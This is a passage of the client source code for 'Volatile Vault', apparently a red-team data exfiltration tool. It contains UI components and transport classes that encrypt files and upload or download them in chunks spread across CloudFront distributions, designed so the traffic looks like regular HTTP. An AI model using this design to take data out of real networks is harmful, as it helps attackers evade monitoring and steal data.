301 | {/* 4 - Select storage */} 302 | 303 | 304 | 305 | {selectedStorage == null ? ( 306 | isUploadMode ? ( 307 | 'Which option should be used for storage?' 308 | ) : ( 309 | 310 | Downloads will determine the storage used automatically. 311 | 312 | ) 313 | ) : ( 314 | You will use {selectedStorage.displayName} for storage. 315 | )} 316 | 317 | 318 | 319 | 324 | 325 | 326 | {/* 5 - Configure storage */} 327 | 328 | 334 | 335 | {getStorageConfigLabel()} 336 | 337 | 338 | 339 | {selectedStorage?.isConfigurable && ( 340 | <> 341 | {selectedStorage.configView({ 342 | config: config as ApiConfigResponse, 343 | onChange: onConfigChange, 344 | })} 345 | 346 |
347 | 354 |
355 |
356 | 357 | )} 358 |
359 |
360 | {/* 6 - Confirm */} 361 | {step == Steps.Confirm && ( 362 | 363 | 364 | Let's go! 365 | 366 | 367 | 368 | Does everything look right to you? Then let's continue. 369 | 370 | 371 |
372 | 379 | 382 |
383 |
384 |
385 |
386 | )} 387 |
388 | 389 | ); 390 | } 391 | -------------------------------------------------------------------------------- /client/src/components/EnterPassword.tsx: -------------------------------------------------------------------------------- 1 | import { Typography, Stack, TextField, IconButton } from '@mui/material'; 2 | import { useState, useEffect } from 'react'; 3 | import VisibilityIcon from '@mui/icons-material/Visibility'; 4 | import VisibilityOffIcon from '@mui/icons-material/VisibilityOff'; 5 | 6 | interface EnterPasswordProps { 7 | confirm?: boolean; 8 | enabled?: boolean; 9 | onPasswordEntered: (password: string) => void; 10 | children?: JSX.Element; 11 | } 12 | 13 | export default function EnterPassword({ 14 | onPasswordEntered, 15 | confirm = true, 16 | enabled = true, 17 | children, 18 | }: EnterPasswordProps) { 19 | const [password1, setPassword1] = useState(''); 20 | const [password2, setPassword2] = useState(''); 21 | const [show, setShow] = useState(false); 22 | 23 | const onPwd1Change = (event: React.ChangeEvent) => { 24 | setPassword1(event.target.value); 25 | }; 26 | const onPwd2Change = (event: React.ChangeEvent) => { 27 | setPassword2(event.target.value); 28 | }; 29 | 30 | const okay = 31 | password1.length > 0 && (confirm ? password1 === password2 : true); 32 | 33 | useEffect(() => { 34 | if (okay) onPasswordEntered(password1); 35 | }, [password1, password2]); 36 | 37 | const pwd1Error = () => { 38 | if (password1.length === 0) return 'Must not be empty'; 39 | return null; 40 | }; 41 | const pwd2Error = () => { 42 | if (password2.length === 0) return 'Must not be empty'; 43 | if (password2 !== password1) return 'Passwords do not match'; 44 | return null; 45 | }; 46 | 47 | return ( 48 | <> 49 | 50 | Password 51 | 52 | 53 | 64 | {confirm && ( 65 | 76 | )} 77 | setShow(!show)} 81 | > 82 | {show ? : } 83 | 84 | <>{children} 85 | 86 | 87 | ); 88 | } 89 | -------------------------------------------------------------------------------- /client/src/components/Main.tsx: -------------------------------------------------------------------------------- 1 | import { Lock } from '@mui/icons-material'; 2 | import { 3 | CssBaseline, 4 | Typography, 5 | Container, 6 | Card, 7 | CardContent, 8 | CardMedia, 9 | Stack, 10 | IconButton, 11 | } from '@mui/material'; 12 | import React, { useState } from 'react'; 13 | import Api, { ApiConfigResponse } from '../utils/Api'; 14 | import { SelectedMode } from './ModeSelector'; 15 | import { 16 | ExfilDownloadViewProps, 17 | ExfilExtension, 18 | StorageExtension, 19 | } from './extensions/Extension'; 20 | import BasicWizard from './BasicWizard'; 21 | import ArrowBackIcon from '@mui/icons-material/ArrowBack'; 22 | 23 | export default function Main() { 24 | const [api, _] = useState(new Api()); 25 | const [wizardDone, setWizardDone] = useState(false); 26 | const [config, setConfig] = useState(null); 27 | const [mode, setMode] = useState('None'); 28 | const [exfil, setExfil] = useState(null); 29 | const [storage, setStorage] = useState(null); 30 | 31 | function onWizardFinished( 32 | config: ApiConfigResponse, 33 | mode: SelectedMode, 34 | exfil: ExfilExtension, 35 | storage?: StorageExtension 36 | ) { 37 | setConfig(config); 38 | setMode(mode); 39 | setExfil(exfil); 40 | setStorage(storage ? storage : null); 41 | setWizardDone(true); 42 | } 43 | 44 | function getExfilView() { 45 | if (exfil === null) return <>Exfil unset!; 46 | 47 | switch (mode) { 48 | case 'UploadSingle': { 49 | const View: (props: ExfilDownloadViewProps) => JSX.Element = 50 | exfil.uploadSingleView; 51 | return ; 52 | } 53 | case 'DownloadSingle': { 54 | const View: () => JSX.Element = exfil.downloadSingleView; 55 | return ; 56 | } 57 | case 'UploadChunked': { 58 | const View: (props: ExfilDownloadViewProps) => JSX.Element = 59 | exfil.uploadChunkedView; 60 | return ; 61 | } 62 | case 'DownloadChunked': { 63 | const View: () => JSX.Element = exfil.downloadChunkedView; 64 | return ; 65 | } 66 | } 67 | } 68 | 69 | function getModeString() { 70 | switch (mode) { 71 | case 'UploadSingle': 72 | return 'Basic upload'; 73 | case 'DownloadSingle': 74 | return 'Basic download'; 75 | case 'DownloadChunked': 76 | return 'Chunked download'; 77 | case 'UploadChunked': 78 | return 'Chunked upload'; 79 | default: 80 | throw new Error(`Invalid mode ${mode} at this stage!`); 81 | } 82 | } 83 | 84 | return ( 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | Volatile Vault 95 | 96 | 97 | 98 | 99 | {wizardDone === false && ( 100 | 101 | )} 102 | {wizardDone && ( 103 | <> 104 | 105 | setWizardDone(false)}> 106 | 107 | 108 | 109 | {exfil?.displayName} - {getModeString()} 110 | 111 | 112 | {getExfilView()} 113 | 114 | )} 115 | 116 | 117 | 118 | 119 | ); 120 | } 121 | -------------------------------------------------------------------------------- /client/src/components/ModeSelector.tsx: -------------------------------------------------------------------------------- 1 | import { Button, Stack } from '@mui/material'; 2 | import { ExfilExtension } from './extensions/Extension'; 3 | 4 | export type SelectedMode = 5 | | 'None' 6 | | 'UploadSingle' 7 | | 'DownloadSingle' 8 | | 'UploadChunked' 9 | | 'DownloadChunked'; 10 | 11 | interface SelectorProps { 12 | exfils: ExfilExtension[]; 13 | onSelected: (type: SelectedMode, exfils: ExfilExtension[]) => void; 14 | } 15 | 16 | export default function ModeSelector({ exfils, onSelected }: SelectorProps) { 17 | var hasUploadSingle = exfils.find((e) => e.canUploadSingle); 18 | var hasDownloadSingle = exfils.find((e) => e.canDownloadSingle); 19 | var hasUploadChunked = exfils.find((e) => e.canUploadChunked); 20 | var hasDownloadChunked = exfils.find((e) => e.canDownloadChunked); 21 | 22 | const onModeSelected = (type: SelectedMode) => { 23 | if (type == 'None') throw new Error('Invalid selector type None'); 24 | const matchedExfils = exfils.filter((e) => 25 | e.capabilities.find((c) => c == type) 26 | ); 27 | 28 | onSelected(type, matchedExfils); 29 | }; 30 | 31 | return ( 32 | 33 | {(hasUploadSingle || hasDownloadSingle) && ( 34 | 35 | {hasUploadSingle && ( 36 | 42 | )} 43 | {hasDownloadSingle && ( 44 | 50 | )} 51 | 52 | )} 53 | {(hasUploadChunked || hasDownloadChunked) && ( 54 | 55 | {hasUploadChunked && ( 56 | 62 | )} 63 | {hasDownloadChunked && ( 64 | 70 | )} 71 | 72 | )} 73 | 74 | ); 75 | } 76 | -------------------------------------------------------------------------------- /client/src/components/extensions/ExtensionManager.ts: -------------------------------------------------------------------------------- 1 | import Api, { ApiConfigResponse } from '../../utils/Api'; 2 | import Config from '../../utils/Config'; 3 | import { ExfilExtension, StorageExtension } from './Extension'; 4 | import { DummyExfil } from './exfil/DummyExfil'; 5 | import { BasicHttpExfil } from './exfil/BasicHttpExfil'; 6 | import { DummyStorage } from './storage/DummyStorage'; 7 | import { FileSystem } from './storage/FileSystem'; 8 | import { AwsCloudFrontExfil } from './exfil/AwsCloudFrontExfil'; 9 | import { AwsS3 } from './storage/AwsS3'; 10 | 11 | export function initializeExfilExtensions( 12 | api: Api, 13 | config: ApiConfigResponse 14 | ): ExfilExtension[] { 15 | if (Config.DEBUG) 16 | return [ 17 | new BasicHttpExfil(api, config), 18 | new AwsCloudFrontExfil(api, config), 19 | new DummyExfil(api, config), 20 | ]; 21 | else 22 | return [ 23 | new BasicHttpExfil(api, config), 24 | new AwsCloudFrontExfil(api, config), 25 | ]; 26 | } 27 | 28 | export function getStorages(): StorageExtension[] { 29 | if (Config.DEBUG) return [new FileSystem(), new AwsS3(), new DummyStorage()]; 30 | else return [new FileSystem(), new AwsS3()]; 31 | } 32 | -------------------------------------------------------------------------------- /client/src/components/extensions/exfil/AwsCloudFrontExfil.tsx: -------------------------------------------------------------------------------- 1 | import axios from 'axios'; 2 | import Api, { 3 | ApiDownloadResponse, 4 | ApiUploadResponse, 5 | ApiResponse, 6 | ApiConfigAwsCloudFrontExfil, 7 | } from '../../../utils/Api'; 8 | import { 9 | BaseExfilExtension, 10 | ConfigFn, 11 | ExfilDownloadFn, 12 | ExfilDownloadViewProps, 13 | ExfilProviderCapabilities, 14 | ExfilUploadFn, 15 | ReportEvent, 16 | } from '../Extension'; 17 | import GenericHttpDownload from '../../ui/GenericHttpDownload'; 18 | import GenericHttpUpload from '../../ui/GenericHttpUpload'; 19 | import { formatSize } from '../../../utils/Files'; 20 | 21 | export class AwsCloudFrontExfil extends BaseExfilExtension { 22 | get downloadSingleView(): ExfilDownloadFn { 23 | throw new Error('Method not implemented.'); 24 | } 25 | get uploadSingleView(): ExfilUploadFn { 26 | throw new Error('Method not implemented.'); 27 | } 28 | get configView(): ConfigFn { 29 | throw new Error('Method not implemented.'); 30 | } 31 | get downloadChunkedView(): ExfilDownloadFn { 32 | return () => ; 33 | } 34 | get uploadChunkedView(): ExfilUploadFn { 35 | return ({ storage }: ExfilDownloadViewProps) => ( 36 | 37 | ); 38 | } 39 | 40 | get name(): string { 41 | return 'awscloudfront'; 42 | } 43 | get displayName(): string { 44 | return 'AWS CloudFront'; 45 | } 46 | get description(): string { 47 | return 'Uses either pre-deployed or dynamically deployed CloudFront distributions to proxy uploads and downloads through. Files are zipped & encrypted before upload and decrypted & unzipped after download. Uploads and downloads use a REST interface and data is transferred in multiple blobs to different hosts. Transfer looks like regular HTTP uploads/downloads.'; 48 | } 49 | get capabilities(): ExfilProviderCapabilities[] { 50 | return ['UploadChunked', 'DownloadChunked']; 51 | } 52 | override isPresent(): boolean { 53 | return ( 54 | this.config.exfils.awscloudfront !== undefined && 55 | this.config.exfils.awscloudfront !== null 56 | ); 57 | } 58 | getConfig(): ApiConfigAwsCloudFrontExfil { 59 | if (!this.config.exfils.awscloudfront) 60 | throw new Error('Attempted to access missing awscloudfront config!'); 61 | return this.config.exfils.awscloudfront.info as ApiConfigAwsCloudFrontExfil; 62 | } 63 | 64 | downloadSingle( 65 | id: string, 66 | reportEvent?: ReportEvent | undefined 67 | ): Promise { 68 | throw new Error('Method not supported.'); 69 | } 70 | 71 | async uploadSingle( 72 | storage: string, 73 | data: ArrayBuffer, 74 | reportEvent?: ReportEvent | undefined 75 | ): Promise { 76 | throw new Error('Method not supported.'); 77 | } 78 | 79 | async downloadChunked( 80 | id: string, 81 | reportEvent?: ReportEvent | undefined 82 | ): Promise { 83 | try { 84 | // Initiate download 85 | const initChunkedData = await this.initChunkedDownload(id); 86 | 87 | reportEvent && 88 | reportEvent( 89 | 'Control', 90 | `TransferID: ${initChunkedData.id}, Chunks: ${ 91 | initChunkedData.chunks 92 | }, Size: ${formatSize(initChunkedData.size)}` 93 | ); 94 | 95 | if (this.getConfig().download.mode == 'Dynamic') 96 | reportEvent && 97 | reportEvent( 98 | 'Control', 99 | 'Chunked download uses dynamically deployed distributions; this might take several minutes' 100 | ); 101 | 102 | // Wait for domains to become ready 103 | const delay = (ms: number) => 104 | new Promise((resolve) => setTimeout(resolve, ms)); 105 | var domainsReady = false; 106 | do { 107 | const info = await this.getTransferStatus( 108 | initChunkedData.hosts[0], 109 | initChunkedData.id 110 | ); 111 | domainsReady = info.status; 112 | if (!domainsReady) { 113 | await delay(10); 114 | reportEvent && 115 | reportEvent('Info', 'Waiting for distributions to deploy...'); 116 | } 117 | } while (!domainsReady); 118 | 119 | // Download all chunks 120 | reportEvent && 121 | reportEvent( 122 | 'Download', 123 | `Downloading ${initChunkedData.chunks} chunks...` 124 | ); 125 | const chunks = await Promise.all( 126 | Array.from({ length: initChunkedData.chunks }, (_, key) => 127 | this.downloadChunk( 128 | initChunkedData.hosts[key % initChunkedData.hosts.length], 129 | initChunkedData.id, 130 | key 131 | ).then((res) => { 132 | reportEvent && 133 | reportEvent( 134 | 'Download', 135 | `Downloaded ${formatSize( 136 | res.data.byteLength 137 | )} from chunk #${key}.` 138 | ); 139 | return res; 140 | }) 141 | ) 142 | ); 143 | 144 | const totalLength = chunks.reduce( 145 | (acc, chunk) => acc + chunk.data.byteLength, 146 | 0 147 | ); 148 | const allChunks = new ArrayBuffer(totalLength); 149 | const allChunksView = new Uint8Array(allChunks); 150 | let offset = 0; 151 | 152 | chunks.forEach((chunk) => { 153 | allChunksView.set(new Uint8Array(chunk.data), offset); 154 | offset += chunk.data.byteLength; 155 | }); 156 | 157 | // Terminate download 158 | await this.terminateDownload( 159 | initChunkedData.hosts[0], 160 | initChunkedData.id 161 | ); 162 | 163 | reportEvent && reportEvent('Info', 'Download finished!', 'success'); 164 | 165 | return Api.success_from_data({ data: allChunks }) as ApiDownloadResponse; 166 | } catch (error) { 167 | return Promise.reject( 168 | Api.fail_from_error( 169 | error, 170 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 171 | ) as ApiDownloadResponse 172 | ); 173 | } 174 | } 175 | 176 | async uploadChunked( 177 | storage: string, 178 | data: ArrayBuffer, 179 | reportEvent?: ReportEvent | undefined 180 | ): Promise { 181 | // Initiate download 182 | const initChunkedData = await this.initChunkedUpload(storage, data); 183 | 184 | reportEvent && 185 | reportEvent( 186 | 'Control', 187 | `TransferID: ${initChunkedData.id}, Chunks: ${ 188 | initChunkedData.chunks 189 | }, Size: ${formatSize(initChunkedData.size)}` 190 | ); 191 | 192 | const chunksize = this.getConfig().chunk_size as number; 193 | const chunks = Array.from({ length: initChunkedData.chunks }, (_, key) => 194 | data.slice(key * chunksize, key * chunksize + chunksize) 195 | ); 196 | 197 | if (this.getConfig().upload.mode == 'Dynamic') 198 | reportEvent && 199 | reportEvent( 200 | 'Control', 201 | 'Chunked upload uses dynamically deployed distributions; this might take several minutes' 202 | ); 203 | 204 | // Wait for domains to become ready 205 | const delay = (ms: number) => 206 | new Promise((resolve) => setTimeout(resolve, ms)); 207 | var domainsReady = false; 208 | do { 209 | const info = await this.getTransferStatus( 210 | initChunkedData.hosts[0], 211 | initChunkedData.id 212 | ); 213 | domainsReady = info.status; 214 | if (!domainsReady) { 215 | await delay(10); 216 | reportEvent && 217 | reportEvent('Info', 'Waiting for distributions to deploy...'); 218 | } 219 | } while (!domainsReady); 220 | 221 | // Upload all chunks 222 | reportEvent && 223 | reportEvent('Upload', `Uploading ${initChunkedData.chunks} chunks...`); 224 | 225 | const res = await Promise.all( 226 | chunks.map((chunk, i) => 227 | this.uploadChunk( 228 | initChunkedData.hosts[i % initChunkedData.hosts.length], 229 | initChunkedData.id, 230 | i, 231 | chunk 232 | ).then((res) => { 233 | reportEvent && 234 | reportEvent( 235 | 'Upload', 236 | `Uploaded ${formatSize(chunks[i].byteLength)} for chunk #${i}.` 237 | ); 238 | return res; 239 | }) 240 | ) 241 | ); 242 | 243 | const id = res.find((r) => r.id !== undefined); 244 | if (!id) throw new Error('Did not receive a file ID'); 245 | 246 | reportEvent && reportEvent('Info', 'Upload finished!', 'success'); 247 | 248 | return id; 249 | } 250 | addHost(reportEvent: ReportEvent): Promise { 251 | throw new Error('Method not supported.'); 252 | } 253 | removeHost(host: string, reportEvent: ReportEvent): Promise { 254 | throw new Error('Method not supported.'); 255 | } 256 | 257 | static PROTO = window.location.protocol; 258 | async initChunkedDownload(id: string): Promise { 259 | const cfg = this.getConfig(); 260 | const host = 261 | cfg.download.hosts && cfg.download.hosts.length 262 | ? cfg.download.hosts[ 263 | Math.floor(Math.random() * cfg.download.hosts.length) 264 | ] 265 | : Api.BASE_URL; 266 | 267 | try { 268 | const res = await axios.post( 269 | `/api/${this.name}/initdownload/${id}`, 270 | {}, 271 | { 272 | headers: { 273 | Authorization: `Bearer ${this.api.token}`, 274 | }, 275 | responseType: 'json', 276 | withCredentials: true, 277 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 278 | } 279 | ); 280 | 281 | if (!res.data) 282 | return Promise.reject( 283 | Api.fail_from_error(undefined, 'Failed to init download') 284 | ); 285 | 286 | return Api.success_from_data(res.data) as InitChunkedResponse; 287 | } catch (error) { 288 | return Promise.reject( 289 | Api.fail_from_error( 290 | error, 291 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 292 | ) as ApiDownloadResponse 293 | ); 294 | } 295 | } 296 | 297 | async downloadChunk( 298 | host: string, 299 | transferId: string, 300 | chunkNo: number 301 | ): Promise { 302 | try { 303 | const res = await axios.get( 304 | `/api/${this.name}/download/${transferId}/chunk/${chunkNo}`, 305 | { 306 | headers: { 307 | Authorization: `Bearer ${this.api.token}`, 308 | }, 309 | responseType: 'arraybuffer', 310 | withCredentials: true, 311 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 312 | } 313 | ); 314 | 315 | if (!res.data) 316 | return Promise.reject( 317 | Api.fail_from_error(undefined, 'Failed to download data') 318 | ); 319 | 320 | return Api.success_from_data({ 321 | data: res.data, 322 | }) as ApiDownloadResponse; 323 | } catch (error) { 324 | return Promise.reject( 325 | Api.fail_from_error( 326 | error, 327 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 328 | ) as ApiDownloadResponse 329 | ); 330 | } 331 | } 332 | 333 | async getTransferStatus( 334 | host: string, 335 | transferId: string 336 | ): Promise { 337 | try { 338 | const res = await axios.get(`/api/${this.name}/status/${transferId}`, { 339 | headers: { 340 | Authorization: `Bearer ${this.api.token}`, 341 | }, 342 | responseType: 'json', 343 | withCredentials: true, 344 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 345 | }); 346 | 347 | if (!res.data) 348 | return Promise.reject( 349 | Api.fail_from_error(undefined, 'Failed to download data') 350 | ); 351 | 352 | return Api.success_from_data(res.data) as TransferStatusResponse; 353 | } catch (error) { 354 | return Promise.reject( 355 | Api.fail_from_error( 356 | error, 357 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 358 | ) as TransferStatusResponse 359 | ); 360 | } 361 | } 362 | 363 | async terminateDownload( 364 | host: string, 365 | transferId: string 366 | ): Promise { 367 | try { 368 | const res = await axios.post( 369 | `/api/${this.name}/download/terminate/${transferId}`, 370 | {}, 371 | { 372 | headers: { 373 | Authorization: `Bearer ${this.api.token}`, 374 | }, 375 | responseType: 'json', 376 | withCredentials: true, 377 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 378 | } 379 | ); 380 | 381 | if (res.status != 200) 382 | return Promise.reject( 383 | Api.fail_from_error(undefined, 'Failed to terminate download') 384 | ); 385 | 386 | return Api.success_from_data({}) as ApiResponse; 387 | } catch (error) { 388 | return Promise.reject( 389 | Api.fail_from_error( 390 | error, 391 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 392 | ) as ApiResponse 393 | ); 394 | } 395 | } 396 | 397 | async initChunkedUpload( 398 | storage: string, 399 | data: ArrayBuffer 400 | ): Promise { 401 | const cfg = this.getConfig(); 402 | const host = 403 | cfg.download.hosts && cfg.download.hosts.length 404 | ? cfg.download.hosts[ 405 | Math.floor(Math.random() * cfg.download.hosts.length) 406 | ] 407 | : Api.BASE_URL; 408 | 409 | try { 410 | const res = await axios.post( 411 | `/api/${this.name}/initupload/${storage}/${data.byteLength}`, 412 | {}, 413 | { 414 | headers: { 415 | Authorization: `Bearer ${this.api.token}`, 416 | }, 417 | responseType: 'json', 418 | withCredentials: true, 419 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 420 | } 421 | ); 422 | 423 | if (!res.data) 424 | return Promise.reject( 425 | Api.fail_from_error(undefined, 'Failed to init upload') 426 | ); 427 | 428 | return Api.success_from_data(res.data) as InitChunkedResponse; 429 | } catch (error) { 430 | return Promise.reject( 431 | Api.fail_from_error( 432 | error, 433 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 434 | ) as ApiDownloadResponse 435 | ); 436 | } 437 | } 438 | 439 | async uploadChunk( 440 | host: string, 441 | transferId: string, 442 | chunkNo: number, 443 | data: ArrayBuffer 444 | ): Promise { 445 | const cfg = this.getConfig(); 446 | 447 | try { 448 | const res = await axios.post( 449 | `/api/${this.name}/upload/${transferId}/chunk/${chunkNo}`, 450 | data, 451 | { 452 | headers: { 453 | 'Content-Type': 'application/octet-stream', 454 | Authorization: `Bearer ${this.api.token}`, 455 | }, 456 | maxBodyLength: Infinity, 457 | maxContentLength: Infinity, 458 | responseType: 'json', 459 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 460 | } 461 | ); 462 | 463 | if (res.status != 200) 464 | return Promise.reject( 465 | Api.fail_from_error(undefined, `Failed to upload chunk ${chunkNo}`) 466 | ); 467 | 468 | return Api.success_from_data(res.data) as ApiUploadResponse; 469 | } catch (error) { 470 | return Promise.reject(Api.fail_from_error(error)); 471 | } 472 | } 473 | } 474 | 475 | interface InitChunkedResponse extends ApiResponse { 476 | hosts: string[]; 477 | chunks: number; 478 | size: number; 479 | id: string; 480 | } 481 | 482 | interface TransferStatusResponse extends ApiResponse { 483 | status: boolean; 484 | } 485 | -------------------------------------------------------------------------------- /client/src/components/extensions/exfil/BasicHttpExfil.tsx: -------------------------------------------------------------------------------- 1 | import axios from 'axios'; 2 | import Api, { 3 | ApiConfigBasicHTTPExfil, 4 | ApiDownloadResponse, 5 | ApiUploadResponse, 6 | ApiResponse, 7 | } from '../../../utils/Api'; 8 | import { 9 | BaseExfilExtension, 10 | ConfigFn, 11 | ExfilDownloadFn, 12 | ExfilDownloadViewProps, 13 | ExfilProviderCapabilities, 14 | ExfilUploadFn, 15 | ReportEvent, 16 | } from '../Extension'; 17 | import GenericHttpDownload from '../../ui/GenericHttpDownload'; 18 | import GenericHttpUpload from '../../ui/GenericHttpUpload'; 19 | 20 | export class BasicHttpExfil extends BaseExfilExtension { 21 | get downloadSingleView(): ExfilDownloadFn { 22 | return () => 23 | } 24 | get uploadSingleView(): ExfilUploadFn { 25 | return ({ storage }: ExfilDownloadViewProps) => ( 26 | 27 | ); 28 | } 29 | get configView(): ConfigFn { 30 | throw new Error('Method not supported.'); 31 | } 32 | get downloadChunkedView(): ExfilDownloadFn { 33 | throw new Error('Method not supported.'); 34 | } 35 | get uploadChunkedView(): ExfilUploadFn { 36 | throw new Error('Method not supported.'); 37 | } 38 | 39 | get name(): string { 40 | return 'basichttp'; 41 | } 42 | get displayName(): string { 43 | return 'Built-In HTTP'; 44 | } 45 | get description(): string { 46 | return 'Uses regular HTTP(S) for file uploads and downloads. Files are zipped & encrypted before upload and decrypted & unzipped after download. Uploads and downloads use a REST interface and data is transferred in large, continuous blobs. Transfer looks like regular HTTP uploads/downloads.'; 47 | } 48 | get capabilities(): ExfilProviderCapabilities[] { 49 | return ['UploadSingle', 'DownloadSingle']; 50 | } 51 | override isPresent(): boolean { 52 | return ( 53 | this.config.exfils.basichttp !== undefined && 54 | this.config.exfils.basichttp !== null 55 | ); 56 | } 57 | getConfig(): ApiConfigBasicHTTPExfil { 58 | if (!this.config.exfils.basichttp) 59 | throw new Error('Attempted to access missing basichttp config!'); 60 | return this.config.exfils.basichttp.info as ApiConfigBasicHTTPExfil; 61 | } 62 | 63 | async downloadSingle( 64 | id: string, 65 | reportEvent?: ReportEvent | undefined 66 | ): Promise { 67 | const cfg = this.getConfig(); 68 | const host = 69 | cfg.hosts && cfg.hosts.length 70 | ? cfg.hosts[Math.floor(Math.random() * cfg.hosts.length)] 71 | : Api.BASE_URL; 72 | 73 | try { 74 | const res = await axios.get(`${host}/api/${this.name}/download/${id}`, { 75 | headers: { 76 | Authorization: `Bearer ${this.api.token}`, 77 | }, 78 | responseType: 'arraybuffer', 79 | }); 80 | 81 | if (!res.data) 82 | return Promise.reject( 83 | Api.fail_from_error(undefined, 'Failed to download data') 84 | ); 85 | 86 | return Api.success_from_data({ 87 | data: res.data, 88 | }) as ApiDownloadResponse; 89 | } catch (error) { 90 | return Promise.reject( 91 | Api.fail_from_error( 92 | error, 93 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 94 | ) as ApiDownloadResponse 95 | ); 96 | } 97 | } 98 | 99 | async uploadSingle( 100 | storage: string, 101 | data: ArrayBuffer, 102 | reportEvent?: ReportEvent | undefined 103 | ): Promise { 104 | const cfg = this.getConfig(); 105 | const host = 106 | cfg.hosts && cfg.hosts.length 107 | ? cfg.hosts[Math.floor(Math.random() * cfg.hosts.length)] 108 | : Api.BASE_URL; 109 | 110 | try { 111 | const res = await axios.post( 112 | `${host}/api/${this.name}/upload/${storage}`, 113 | data, 114 | { 115 | headers: { 116 | 'Content-Type': 'application/octet-stream', 117 | Authorization: `Bearer ${this.api.token}`, 118 | }, 119 | maxBodyLength: Infinity, 120 | maxContentLength: Infinity, 121 | responseType: 'json', 122 | } 123 | ); 124 | 125 | if (!res.data?.id) 126 | return Promise.reject( 127 | Api.fail_from_error(undefined, 'Failed to upload file ID') 128 | ); 129 | 130 | return Api.success_from_data(res.data) as ApiUploadResponse; 131 | } catch (error) { 132 | return Promise.reject(Api.fail_from_error(error)); 133 | } 134 | } 135 | downloadChunked( 136 | id: string, 137 | reportEvent?: ReportEvent | undefined 138 | ): Promise { 139 | throw new Error('Method not supported.'); 140 | } 141 | uploadChunked( 142 | storage: string, 143 | data: ArrayBuffer, 144 | reportEvent?: ReportEvent | undefined 145 | ): Promise { 146 | throw new Error('Method not supported.'); 147 | } 148 | addHost(reportEvent: ReportEvent): Promise { 149 | throw new Error('Method not supported.'); 150 | } 151 | removeHost(host: string, reportEvent: ReportEvent): Promise { 152 | throw new Error('Method not supported.'); 153 | } 154 | } 155 | -------------------------------------------------------------------------------- /client/src/components/extensions/exfil/DummyExfil.tsx: -------------------------------------------------------------------------------- 1 | import { 2 | ApiConfigBaseExfil, 3 | ApiConfigResponse, 4 | ApiDownloadResponse, 5 | ApiUploadResponse, 6 | ApiResponse, 7 | } from '../../../utils/Api'; 8 | import { 9 | BaseExfilExtension, 10 | ConfigFn, 11 | ConfigViewProps, 12 | ExfilDownloadFn, 13 | ExfilDownloadViewProps, 14 | ExfilProviderCapabilities, 15 | ExfilUploadFn, 16 | ReportEvent, 17 | StorageExtension, 18 | } from '../Extension'; 19 | 20 | export class DummyExfil extends BaseExfilExtension { 21 | get downloadSingleView(): ExfilDownloadFn { 22 | return () => <>Dummy single download; 23 | } 24 | get uploadSingleView(): ExfilUploadFn { 25 | return ({ storage }: ExfilDownloadViewProps) => <>Dummy single upload; 26 | } 27 | get downloadChunkedView(): ExfilDownloadFn { 28 | return () => <>Dummy chunked download; 29 | } 30 | get uploadChunkedView(): ExfilUploadFn { 31 | return ({ storage }: ExfilDownloadViewProps) => <>Dummy chunked upload; 32 | } 33 | get configView(): ConfigFn { 34 | return (props: ConfigViewProps) => <>Dummy config view; 35 | } 36 | get capabilities(): ExfilProviderCapabilities[] { 37 | return [ 38 | 'UploadSingle', 39 | 'UploadChunked', 40 | 'DownloadChunked', 41 | 'DownloadSingle', 42 | 'RemoveHost', 43 | 'AddHost', 44 | ]; 45 | } 46 | isPresent(): boolean { 47 | return true; 48 | } 49 | getConfig(): ApiConfigBaseExfil { 50 | return { 51 | max_total_size: 1024 * 1024 * 1024, 52 | chunk_size: 1024 * 1024 * 1024, 53 | }; 54 | } 55 | 56 | downloadSingle( 57 | id: string, 58 | reportEvent?: ReportEvent | undefined 59 | ): Promise { 60 | throw new Error('Method not implemented.'); 61 | } 62 | uploadSingle( 63 | storage: string, 64 | data: ArrayBuffer, 65 | reportEvent?: ReportEvent | undefined 66 | ): Promise { 67 | throw new Error('Method not implemented.'); 68 | } 69 | downloadChunked( 70 | id: string, 71 | reportEvent?: ReportEvent | undefined 72 | ): Promise { 73 | throw new Error('Method not implemented.'); 74 | } 75 | uploadChunked( 76 | storage: string, 77 | data: ArrayBuffer, 78 | reportEvent?: ReportEvent | undefined 79 | ): Promise { 80 | throw new Error('Method not implemented.'); 81 | } 82 | addHost(reportEvent: ReportEvent): Promise { 83 | throw new Error('Method not implemented.'); 84 | } 85 | removeHost(host: string, reportEvent: ReportEvent): Promise { 86 | throw new Error('Method not implemented.'); 87 | } 88 | get name(): string { 89 | return 'dummyexfil'; 90 | } 91 | get displayName(): string { 92 | return 'Dummy Exfiltration Transport'; 93 | } 94 | get description(): string { 95 | return "Non-functional dummy exfiltration transport. This won't do anything and is only used for testing the frontend. It offers all capabilities Volatile Vault provides to exfiltration extensions."; 96 | } 97 | } 98 | -------------------------------------------------------------------------------- /client/src/components/extensions/extension.tsx: -------------------------------------------------------------------------------- 1 | import Api, { 2 | ApiConfigBaseExfil, 3 | ApiConfigResponse, 4 | ApiDownloadResponse, 5 | ApiUploadResponse, 6 | } from '../../utils/Api'; 7 | 8 | export type ExfilProviderCapabilities = 9 | | 'None' 10 | | 'UploadSingle' 11 | | 'DownloadSingle' 12 | | 'UploadChunked' 13 | | 'DownloadChunked' 14 | | 'AddHost' 15 | | 'RemoveHost'; 16 | 17 | // Callback used to provide live updates to the UI 18 | export type ReportEvent = ( 19 | category: string, 20 | content: string, 21 | variant?: 'error' | 'success' 22 | ) => void; 23 | 24 | export interface BasicInfoHolder { 25 | name: string; 26 | displayName: string; 27 | description: string; 28 | isPresent: (config: ApiConfigResponse) => boolean; 29 | isConfigurable: boolean; 30 | configView: ConfigFn; 31 | } 32 | 33 | export interface StorageExtension extends BasicInfoHolder { 34 | } 35 | 36 | export interface ExfilDownloadViewProps { 37 | storage: StorageExtension; 38 | } 39 | export interface ConfigViewProps { 40 | config: ApiConfigResponse; 41 